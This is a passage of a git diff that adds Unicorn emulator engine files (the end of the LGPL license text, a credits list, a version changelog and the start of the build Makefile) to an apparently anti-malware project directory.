And you must show them these terms so they know their rights. + + Our method of protecting your rights has two steps: (1) copyright +the library, and (2) offer you this license which gives you legal +permission to copy, distribute and/or modify the library. + + Also, for each distributor's protection, we want to make certain +that everyone understands that there is no warranty for this free +library. If the library is modified by someone else and passed on, we +want its recipients to know that what they have is not the original +version, so that any problems introduced by others will not reflect on +the original authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that companies distributing free +software will individually obtain patent licenses, thus in effect +transforming the program into proprietary software. To prevent this, +we have made it clear that any patent must be licensed for everyone's +free use or not licensed at all. + + Most GNU software, including some libraries, is covered by the ordinary +GNU General Public License, which was designed for utility programs. This +license, the GNU Library General Public License, applies to certain +designated libraries. This license is quite different from the ordinary +one; be sure to read it in full, and don't assume that anything in it is +the same as in the ordinary license. + + The reason we have a separate public license for some libraries is that +they blur the distinction we usually make between modifying or adding to a +program and simply using it. Linking a program with a library, without +changing the library, is in some sense simply using the library, and is +analogous to running a utility program or application program. However, in +a textual and legal sense, the linked executable is a combined work, a +derivative of the original library, and the ordinary General Public License +treats it as such. 
+ + Because of this blurred distinction, using the ordinary General +Public License for libraries did not effectively promote software +sharing, because most developers did not use the libraries. We +concluded that weaker conditions might promote sharing better. + + However, unrestricted linking of non-free programs would deprive the +users of those programs of all benefit from the free status of the +libraries themselves. This Library General Public License is intended to +permit developers of non-free programs to use free libraries, while +preserving your freedom as a user of such programs to change the free +libraries that are incorporated in them. (We have not seen how to achieve +this as regards changes in header files, but we have achieved it as regards +changes in the actual functions of the Library.) The hope is that this +will lead to faster development of free libraries. + + The precise terms and conditions for copying, distribution and +modification follow. Pay close attention to the difference between a +"work based on the library" and a "work that uses the library". The +former contains code derived from the library, while the latter only +works together with the library. + + Note that it is possible for a library to be covered by the ordinary +General Public License rather than by this special one. + + GNU LIBRARY GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License Agreement applies to any software library which +contains a notice placed by the copyright holder or other authorized +party saying it may be distributed under the terms of this Library +General Public License (also called "this License"). Each licensee is +addressed as "you". + + A "library" means a collection of software functions and/or data +prepared so as to be conveniently linked with application programs +(which use some of those functions and data) to form executables. 
+ + The "Library", below, refers to any such software library or work +which has been distributed under these terms. A "work based on the +Library" means either the Library or any derivative work under +copyright law: that is to say, a work containing the Library or a +portion of it, either verbatim or with modifications and/or translated +straightforwardly into another language. (Hereinafter, translation is +included without limitation in the term "modification".) + + "Source code" for a work means the preferred form of the work for +making modifications to it. For a library, complete source code means +all the source code for all modules it contains, plus any associated +interface definition files, plus the scripts used to control compilation +and installation of the library. + + Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running a program using the Library is not restricted, and output from +such a program is covered only if its contents constitute a work based +on the Library (independent of the use of the Library in a tool for +writing it). Whether that is true depends on what the Library does +and what the program that uses the Library does. + + 1. You may copy and distribute verbatim copies of the Library's +complete source code as you receive it, in any medium, provided that +you conspicuously and appropriately publish on each copy an +appropriate copyright notice and disclaimer of warranty; keep intact +all the notices that refer to this License and to the absence of any +warranty; and distribute a copy of this License along with the +Library. + + You may charge a fee for the physical act of transferring a copy, +and you may at your option offer warranty protection in exchange for a +fee. + + 2. 
You may modify your copy or copies of the Library or any portion +of it, thus forming a work based on the Library, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) The modified work must itself be a software library. + + b) You must cause the files modified to carry prominent notices + stating that you changed the files and the date of any change. + + c) You must cause the whole of the work to be licensed at no + charge to all third parties under the terms of this License. + + d) If a facility in the modified Library refers to a function or a + table of data to be supplied by an application program that uses + the facility, other than as an argument passed when the facility + is invoked, then you must make a good faith effort to ensure that, + in the event an application does not supply such function or + table, the facility still operates, and performs whatever part of + its purpose remains meaningful. + + (For example, a function in a library to compute square roots has + a purpose that is entirely well-defined independent of the + application. Therefore, Subsection 2d requires that any + application-supplied function or table used by this function must + be optional: if the application does not supply it, the square + root function must still compute square roots.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Library, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. 
But when you +distribute the same sections as part of a whole which is a work based +on the Library, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote +it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Library. + +In addition, mere aggregation of another work not based on the Library +with the Library (or with a work based on the Library) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may opt to apply the terms of the ordinary GNU General Public +License instead of this License to a given copy of the Library. To do +this, you must alter all the notices that refer to this License, so +that they refer to the ordinary GNU General Public License, version 2, +instead of to this License. (If a newer version than version 2 of the +ordinary GNU General Public License has appeared, then you can specify +that version instead if you wish.) Do not make any other change in +these notices. + + Once this change is made in a given copy, it is irreversible for +that copy, so the ordinary GNU General Public License applies to all +subsequent copies and derivative works made from that copy. + + This option is useful when you wish to copy part of the code of +the Library into a program that is not a library. + + 4. 
You may copy and distribute the Library (or a portion or +derivative of it, under Section 2) in object code or executable form +under the terms of Sections 1 and 2 above provided that you accompany +it with the complete corresponding machine-readable source code, which +must be distributed under the terms of Sections 1 and 2 above on a +medium customarily used for software interchange. + + If distribution of object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the +source code from the same place satisfies the requirement to +distribute the source code, even though third parties are not +compelled to copy the source along with the object code. + + 5. A program that contains no derivative of any portion of the +Library, but is designed to work with the Library by being compiled or +linked with it, is called a "work that uses the Library". Such a +work, in isolation, is not a derivative work of the Library, and +therefore falls outside the scope of this License. + + However, linking a "work that uses the Library" with the Library +creates an executable that is a derivative of the Library (because it +contains portions of the Library), rather than a "work that uses the +library". The executable is therefore covered by this License. +Section 6 states terms for distribution of such executables. + + When a "work that uses the Library" uses material from a header file +that is part of the Library, the object code for the work may be a +derivative work of the Library even though the source code is not. +Whether this is true is especially significant if the work can be +linked without the Library, or if the work is itself a library. The +threshold for this to be true is not precisely defined by law. 
+ + If such an object file uses only numerical parameters, data +structure layouts and accessors, and small macros and small inline +functions (ten lines or less in length), then the use of the object +file is unrestricted, regardless of whether it is legally a derivative +work. (Executables containing this object code plus portions of the +Library will still fall under Section 6.) + + Otherwise, if the work is a derivative of the Library, you may +distribute the object code for the work under the terms of Section 6. +Any executables containing that work also fall under Section 6, +whether or not they are linked directly with the Library itself. + + 6. As an exception to the Sections above, you may also compile or +link a "work that uses the Library" with the Library to produce a +work containing portions of the Library, and distribute that work +under terms of your choice, provided that the terms permit +modification of the work for the customer's own use and reverse +engineering for debugging such modifications. + + You must give prominent notice with each copy of the work that the +Library is used in it and that the Library and its use are covered by +this License. You must supply a copy of this License. If the work +during execution displays copyright notices, you must include the +copyright notice for the Library among them, as well as a reference +directing the user to the copy of this License. Also, you must do one +of these things: + + a) Accompany the work with the complete corresponding + machine-readable source code for the Library including whatever + changes were used in the work (which must be distributed under + Sections 1 and 2 above); and, if the work is an executable linked + with the Library, with the complete machine-readable "work that + uses the Library", as object code and/or source code, so that the + user can modify the Library and then relink to produce a modified + executable containing the modified Library. 
(It is understood + that the user who changes the contents of definitions files in the + Library will not necessarily be able to recompile the application + to use the modified definitions.) + + b) Accompany the work with a written offer, valid for at + least three years, to give the same user the materials + specified in Subsection 6a, above, for a charge no more + than the cost of performing this distribution. + + c) If distribution of the work is made by offering access to copy + from a designated place, offer equivalent access to copy the above + specified materials from the same place. + + d) Verify that the user has already received a copy of these + materials or that you have already sent this user a copy. + + For an executable, the required form of the "work that uses the +Library" must include any data and utility programs needed for +reproducing the executable from it. However, as a special exception, +the source code distributed need not include anything that is normally +distributed (in either source or binary form) with the major +components (compiler, kernel, and so on) of the operating system on +which the executable runs, unless that component itself accompanies +the executable. + + It may happen that this requirement contradicts the license +restrictions of other proprietary libraries that do not normally +accompany the operating system. Such a contradiction means you cannot +use both them and the Library together in an executable that you +distribute. + + 7. 
You may place library facilities that are a work based on the +Library side-by-side in a single library together with other library +facilities not covered by this License, and distribute such a combined +library, provided that the separate distribution of the work based on +the Library and of the other library facilities is otherwise +permitted, and provided that you do these two things: + + a) Accompany the combined library with a copy of the same work + based on the Library, uncombined with any other library + facilities. This must be distributed under the terms of the + Sections above. + + b) Give prominent notice with the combined library of the fact + that part of it is a work based on the Library, and explaining + where to find the accompanying uncombined form of the same work. + + 8. You may not copy, modify, sublicense, link with, or distribute +the Library except as expressly provided under this License. Any +attempt otherwise to copy, modify, sublicense, link with, or +distribute the Library is void, and will automatically terminate your +rights under this License. However, parties who have received copies, +or rights, from you under this License will not have their licenses +terminated so long as such parties remain in full compliance. + + 9. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Library or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Library (or any work based on the +Library), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Library or works based on it. + + 10. 
Each time you redistribute the Library (or any work based on the +Library), the recipient automatically receives a license from the +original licensor to copy, distribute, link with or modify the Library +subject to these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 11. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Library at all. For example, if a patent +license would not permit royalty-free redistribution of the Library by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Library. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply, +and the section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system which is +implemented by public license practices. 
Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 12. If the distribution and/or use of the Library is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Library under this License may add +an explicit geographical distribution limitation excluding those countries, +so that distribution is permitted only in or among countries not thus +excluded. In such case, this License incorporates the limitation as if +written in the body of this License. + + 13. The Free Software Foundation may publish revised and/or new +versions of the Library General Public License from time to time. +Such new versions will be similar in spirit to the present version, +but may differ in detail to address new problems or concerns. + +Each version is given a distinguishing version number. If the Library +specifies a version number of this License which applies to it and +"any later version", you have the option of following the terms and +conditions either of that version or of any later version published by +the Free Software Foundation. If the Library does not specify a +license version number, you may choose any version ever published by +the Free Software Foundation. + + 14. If you wish to incorporate parts of the Library into other free +programs whose distribution conditions are incompatible with these, +write to the author to ask for permission. For software which is +copyrighted by the Free Software Foundation, write to the Free +Software Foundation; we sometimes make exceptions for this. 
Our +decision will be guided by the two goals of preserving the free status +of all derivatives of our free software and of promoting the sharing +and reuse of software generally. + + NO WARRANTY + + 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO +WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. +EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR +OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY +KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME +THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN +WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY +AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU +FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR +CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE +LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A +FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF +SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH +DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Libraries + + If you develop a new library, and you want it to be of the greatest +possible use to the public, we recommend making it free software that +everyone can redistribute and change. You can do so by permitting +redistribution under these terms (or, alternatively, under the terms of the +ordinary General Public License). + + To apply these terms, attach the following notices to the library. 
It is +safest to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least the +"copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Library General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Library General Public License for more details. + + You should have received a copy of the GNU Library General Public + License along with this library; if not, write to the + Free Software Foundation, Inc., 59 Temple Place - Suite 330, + Boston, MA 02111-1307 USA. + +Also add information on how to contact you by electronic and paper mail. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the library, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the + library `Frob' (a library for tweaking knobs) written by James Random Hacker. + + , 1 April 1990 + Ty Coon, President of Vice + +That's all there is to it! diff --git a/ai_anti_malware/unicorn/unicorn-master/CREDITS.TXT b/ai_anti_malware/unicorn/unicorn-master/CREDITS.TXT new file mode 100644 index 0000000..586d15e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/CREDITS.TXT @@ -0,0 +1,75 @@ +This file credits all the contributors of the Unicorn engine project. 
+ + +Key developers +============== +Nguyen Anh Quynh +Dang Hoang Vu + + +Beta testers (in no particular order) +============================== +Nguyen Tan Cong +Loi Anh Tuan +Edgar Barbosa +Joxean Koret +Chris Eagle +Jay Little, Trail of Bits +Jeong Wook Oh +Luis Miras +Yan Shoshitaishvili, Shellphish & UC Santa Barbara +Erik Fischer +Darel Griffin, NCC Group +Anton Cherepanov +Mohamed Saher (halsten) +Tyler Colgan +Jonathon Reinhart +Blue Skeye +Chris Maixner +Sergi Alvarez, aka pancake (author of radare) +Ryan Hileman +Tim "diff" Strazzere +WanderingGlitch of the Zero Day Initiative +Sascha Schirra +François Serman +Sean Heelan +Luke Burnett +Parker Thompson +Daniel Godas-Lopez +Antonio "s4tan" Parata +Corey Kallenberg +Shift +Gabriel Quadros +Fabian Yamaguchi +Ralf-Philipp Weinmann +Mike Guidry +Joshua "posixninja" Hill + + +Contributors (in no particular order) +===================================== +(Please let us know if you want to have your name here) + +Nguyen Tan Cong +Loi Anh Tuan +Shaun Wheelhouse: Homebrew package +Kamil Rytarowski: Pkgsrc package +Zak Escano: MSVC support. +Chris Eagle: Java binding +Ryan Hileman: Go binding +Antonio Parata: .NET binding +Jonathon Reinhart: C unit test +Sascha Schirra: Ruby binding +Adrian Herrera: Haskell binding +practicalswift: Various cool bugs found by fuzzing +farmdve: Memory leaking fix +Andrew Dutcher: uc_context_{save, restore} API. +Stephen Groat: improved CI setup. +David Zimmer: VB6 binding. +zhangwm: ARM & ARM64 big endian. +Mohamed Osama: FreePascal/Delphi binding. +Philippe Antoine (Catena cyber): fuzzing +Huitao Chen (chenhuitao) & KaiJern Lau (xwings): Cmake support +Huitao Chen (chenhuitao) & KaiJern Lau (xwings): Python3 support for building +Kevin Foo (chfl4gs): Travis-CI migration +Ziqiao Kong (lazymio): uc_context_free() API and various bug fix & improvement. 
diff --git a/ai_anti_malware/unicorn/unicorn-master/ChangeLog b/ai_anti_malware/unicorn/unicorn-master/ChangeLog new file mode 100644 index 0000000..64fb906 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/ChangeLog @@ -0,0 +1,115 @@ +This file details the changelog of Unicorn Engine. + +----------------------------------- +[Version 1.0.2]: October 21st, 2020 + +- Fix Java binding compilation +- Enable building for ARM little-endian only (ignore big-endian) + +------------------------------------ +[Version 1.0.2-rc6]: Sept 24th, 2020 + +- Add uc_context_free() API +- Fix context saving/retoring API (core & Python binding) + +------------------------------------ +[Version 1.0.2-rc5]: Sept 22nd, 2020 + +- Add cmake option to build Unicorn as a static library +- Fix error handling of mmap() +- uc_emu_start() can be reentrant +- Fix naming conflicts when built with systemd +- Fix setjmp/longjmp on native Windows +- Fix enabled hooks even after deleting them +- X86: + - Fix 64bit fstenv + - Fix IP value of 16bit mode +- ARM: + - Fix APSR handling +- Python: Remove UC_ERR_TIMEOUT + +----------------------------------- +[Version 1.0.2-rc4]: May 29th, 2020 + +- No longer require Python to build +- Fix recursive UC_HOOK_MEM callbacks for cross pages access +- Remove UC_ERR_TIMEOUT, so timeout on uc_emu_start() is not considered error +- Added UC_QUERY_TIMEOUT to query exit reason +- Fix UAF when deleting hook while in hook callback +- Ensure that hooks are unaffected by a request to stop emulation. +- Fix block hooks being called twice after an early exit from execution. +- Fix binding install on python2 (MacOS) +- X86: + - Support read/write STn registers + - Support read/write X64 base regs +- ARM64: + - Support some new registers + +---------------------------------- +[Version 1.0.1]: April 20th, 2017 + +- Properly handle selected-architecture build. +- Fix compilation issues on PPC & S390x. +- Fix a memory leak on uc_mem_protect(). 
+- ARM: + - Support big-endian mode. + - Correct instruction size of Thumb/Thumb2 code. + - Support read/write APSR register. +- ARM64: + - Support read/write NEON registers. + - Support read/write NZCV registers. +- Mips: Support read/write Mips64 registers. +- X86: Support read/write MSR. +- Haskell binding: update to the latest API. +- Python: allow not having PATH setup. + +---------------------------------- +[Version 1.0]: February 23rd, 2017 + +- Fix build script for BSD host. +- Fix building Unicorn on Arm/PPC/Sparc/S390 hosts. +- X86: + - Fix 16bit address computation. + - Fix initial state of segment registers. + +---------------------------------- +[Version 1.0-rc3]: January 25th, 2017 + +- Rename API uc_context_free() to uc_free(). +- ARM: + - uc_reg_write() now can modify CPSR register. + - Add some ARM coproc registers. +- ARM64: uc_reg_read|write() now handles W0-W31 registers. +- Windows: fix a double free bug in uc_close(). +- New VB6 binding. +- Java: update to support new APIs from v1.0-rc1. +- Python: + - Fix memory leaking that prevents UC instances from being GC. + - Remove some dependencies leftover from glib time. + - Add new method mem_regions() (linked to uc_mem_regions() API) + +---------------------------------- +[Version 1.0-rc2]: January 4th, 2017 + +- Remove glib & pkconfig dependency. +- Python: fix an issue to restore support for FreeBSD (and other *BSD Unix). +- ARM: support MCLASS cpu (Cortex-M3). +- Windows: export a static lib that can be used outside of Mingw + +---------------------------------- +[Version 1.0-rc1]: December 22nd, 2016 + +- Lots of bugfixes in all architectures. +- Better support for ARM Thumb. +- Fix many memory leaking issues. +- New bindings: Haskell, MSVC. +- Better support for Python3. +- New APIs: uc_query, uc_reg_write_batch, uc_reg_read_batch, uc_mem_map_ptr, uc_mem_regions, uc_context_alloc, uc_context_save & uc_context_restore. +- New memory hook type: UC_HOOK_MEM_READ_AFTER. 
+- Add new version macros UC_VERSION_{MAJOR, MINOR, EXTRA} + +---------------------------------- +[Version 0.9]: October 15th, 2015 + +- Initial public release. + diff --git a/ai_anti_malware/unicorn/unicorn-master/Makefile b/ai_anti_malware/unicorn/unicorn-master/Makefile new file mode 100644 index 0000000..5128a02 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/Makefile @@ -0,0 +1,424 @@ +# Unicorn Emulator Engine +# By Dang Hoang Vu , 2015 + + +.PHONY: all clean install uninstall dist header + +include config.mk +include pkgconfig.mk # package version + +LIBNAME = unicorn +UNAME_S := $(shell uname -s) +# SMP_MFLAGS is used for controlling the amount of parallelism used +# in external 'make' invocations. If the user doesn't override it, it +# does "-j4". That is, it uses 4 job threads. If you want to use more or less, +# pass in a different -jX, with X being the number of threads. +# For example, to completely disable parallel building, pass "-j1". +# If you want to use 16 job threads, use "-j16". +SMP_MFLAGS := -j4 + +UC_GET_OBJ = $(shell for i in \ + $$(grep '$(1)' $(2) | \ + grep '\.o' | cut -d '=' -f 2); do \ + echo $$i | grep '\.o' > /dev/null 2>&1; \ + if [ $$? 
= 0 ]; then \ + echo '$(3)'$$i; \ + fi; done; echo) + +UC_TARGET_OBJ = $(filter-out qemu/../%,$(call UC_GET_OBJ,obj-,qemu/Makefile.objs, qemu/)) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-,qemu/hw/core/Makefile.objs, qemu/hw/core/) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-,qemu/qapi/Makefile.objs, qemu/qapi/) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-,qemu/qobject/Makefile.objs, qemu/qobject/) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-,qemu/qom/Makefile.objs, qemu/qom/) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-y,qemu/util/Makefile.objs, qemu/util/) +ifneq ($(filter MINGW%,$(UNAME_S)),) +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-$$(CONFIG_WIN32),qemu/util/Makefile.objs, qemu/util/) +else +UC_TARGET_OBJ += $(call UC_GET_OBJ,obj-$$(CONFIG_POSIX),qemu/util/Makefile.objs, qemu/util/) +endif + +UC_TARGET_OBJ_X86 = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/x86_64-softmmu/) +UC_TARGET_OBJ_X86 += $(call UC_GET_OBJ,obj-,qemu/hw/i386/Makefile.objs, qemu/x86_64-softmmu/hw/i386/) +UC_TARGET_OBJ_X86 += $(call UC_GET_OBJ,obj-,qemu/hw/intc/Makefile.objs, qemu/x86_64-softmmu/hw/intc/) +UC_TARGET_OBJ_X86 += $(call UC_GET_OBJ,obj-,qemu/target-i386/Makefile.objs, qemu/x86_64-softmmu/target-i386/) + +UC_TARGET_OBJ_ARM = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/arm-softmmu/) +UC_TARGET_OBJ_ARM += $(call UC_GET_OBJ,obj-,qemu/hw/arm/Makefile.objs, qemu/arm-softmmu/hw/arm/) +UC_TARGET_OBJ_ARM += $(call UC_GET_OBJ,obj-y,qemu/target-arm/Makefile.objs, qemu/arm-softmmu/target-arm/) +UC_TARGET_OBJ_ARM += $(call UC_GET_OBJ,obj-$$(CONFIG_SOFTMMU),qemu/target-arm/Makefile.objs, qemu/arm-softmmu/target-arm/) +UC_TARGET_OBJ_ARM += $(call UC_GET_OBJ,obj-$$(TARGET_ARM),qemu/target-arm/Makefile.objs, qemu/arm-softmmu/target-arm/) + +UC_TARGET_OBJ_ARMEB = $(subst /arm-softmmu/,/armeb-softmmu/,$(UC_TARGET_OBJ_ARM)) + +UC_TARGET_OBJ_M68K = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/m68k-softmmu/) +UC_TARGET_OBJ_M68K += $(call UC_GET_OBJ,obj-,qemu/hw/m68k/Makefile.objs, 
qemu/m68k-softmmu/hw/m68k/) +UC_TARGET_OBJ_M68K += $(call UC_GET_OBJ,obj-,qemu/target-m68k/Makefile.objs, qemu/m68k-softmmu/target-m68k/) + +UC_TARGET_OBJ_AARCH64 = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/aarch64-softmmu/) +UC_TARGET_OBJ_AARCH64 += $(call UC_GET_OBJ,obj-,qemu/hw/arm/Makefile.objs, qemu/aarch64-softmmu/hw/arm/) +UC_TARGET_OBJ_AARCH64 += $(call UC_GET_OBJ,obj-y,qemu/target-arm/Makefile.objs, qemu/aarch64-softmmu/target-arm/) +UC_TARGET_OBJ_AARCH64 += $(call UC_GET_OBJ,obj-$$(CONFIG_SOFTMMU),qemu/target-arm/Makefile.objs, qemu/aarch64-softmmu/target-arm/) +UC_TARGET_OBJ_AARCH64 += $(call UC_GET_OBJ,obj-$$(TARGET_AARCH64),qemu/target-arm/Makefile.objs, qemu/aarch64-softmmu/target-arm/) + +UC_TARGET_OBJ_AARCH64EB = $(subst /aarch64-softmmu/,/aarch64eb-softmmu/,$(UC_TARGET_OBJ_AARCH64)) + +UC_TARGET_OBJ_MIPS = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/mips-softmmu/) +UC_TARGET_OBJ_MIPS += $(call UC_GET_OBJ,obj-,qemu/hw/mips/Makefile.objs, qemu/mips-softmmu/hw/mips/) +UC_TARGET_OBJ_MIPS += $(call UC_GET_OBJ,obj-,qemu/target-mips/Makefile.objs, qemu/mips-softmmu/target-mips/) + +UC_TARGET_OBJ_MIPSEL = $(subst /mips-softmmu/,/mipsel-softmmu/,$(UC_TARGET_OBJ_MIPS)) + +UC_TARGET_OBJ_MIPS64 = $(subst /mips-softmmu/,/mips64-softmmu/,$(UC_TARGET_OBJ_MIPS)) + +UC_TARGET_OBJ_MIPS64EL = $(subst /mips-softmmu/,/mips64el-softmmu/,$(UC_TARGET_OBJ_MIPS)) + +UC_TARGET_OBJ_SPARC = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/sparc-softmmu/) +UC_TARGET_OBJ_SPARC += $(call UC_GET_OBJ,obj-,qemu/hw/sparc/Makefile.objs, qemu/sparc-softmmu/hw/sparc/) +UC_TARGET_OBJ_SPARC += $(call UC_GET_OBJ,obj-y,qemu/target-sparc/Makefile.objs, qemu/sparc-softmmu/target-sparc/) +UC_TARGET_OBJ_SPARC += $(call UC_GET_OBJ,obj-$$(TARGET_SPARC),qemu/target-sparc/Makefile.objs, qemu/sparc-softmmu/target-sparc/) + +UC_TARGET_OBJ_SPARC64 = $(call UC_GET_OBJ,obj-,qemu/Makefile.target, qemu/sparc64-softmmu/) +UC_TARGET_OBJ_SPARC64 += $(call 
UC_GET_OBJ,obj-,qemu/hw/sparc64/Makefile.objs, qemu/sparc64-softmmu/hw/sparc64/) +UC_TARGET_OBJ_SPARC64 += $(call UC_GET_OBJ,obj-y,qemu/target-sparc/Makefile.objs, qemu/sparc64-softmmu/target-sparc/) +UC_TARGET_OBJ_SPARC64 += $(call UC_GET_OBJ,obj-$$(TARGET_SPARC64),qemu/target-sparc/Makefile.objs, qemu/sparc64-softmmu/target-sparc/) + +ifneq (,$(findstring x86,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_X86) + UNICORN_CFLAGS += -DUNICORN_HAS_X86 + UNICORN_TARGETS += x86_64-softmmu, +endif +ifneq (,$(findstring arm,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_ARM) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_ARMEB) + UNICORN_CFLAGS += -DUNICORN_HAS_ARM + UNICORN_CFLAGS += -DUNICORN_HAS_ARMEB + UNICORN_TARGETS += arm-softmmu, + UNICORN_TARGETS += armeb-softmmu, +endif +ifneq (,$(findstring m68k,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_M68K) + UNICORN_CFLAGS += -DUNICORN_HAS_M68K + UNICORN_TARGETS += m68k-softmmu, +endif +ifneq (,$(findstring aarch64,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_AARCH64) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_AARCH64EB) + UNICORN_CFLAGS += -DUNICORN_HAS_ARM64 + UNICORN_CFLAGS += -DUNICORN_HAS_ARM64EB + UNICORN_TARGETS += aarch64-softmmu, + UNICORN_TARGETS += aarch64eb-softmmu, +endif +ifneq (,$(findstring mips,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_MIPS) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_MIPSEL) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_MIPS64) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_MIPS64EL) + UNICORN_CFLAGS += -DUNICORN_HAS_MIPS + UNICORN_CFLAGS += -DUNICORN_HAS_MIPSEL + UNICORN_CFLAGS += -DUNICORN_HAS_MIPS64 + UNICORN_CFLAGS += -DUNICORN_HAS_MIPS64EL + UNICORN_TARGETS += mips-softmmu, + UNICORN_TARGETS += mipsel-softmmu, + UNICORN_TARGETS += mips64-softmmu, + UNICORN_TARGETS += mips64el-softmmu, +endif +ifneq (,$(findstring sparc,$(UNICORN_ARCHS))) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_SPARC) + UC_TARGET_OBJ += $(UC_TARGET_OBJ_SPARC64) + UNICORN_CFLAGS += -DUNICORN_HAS_SPARC + UNICORN_TARGETS += 
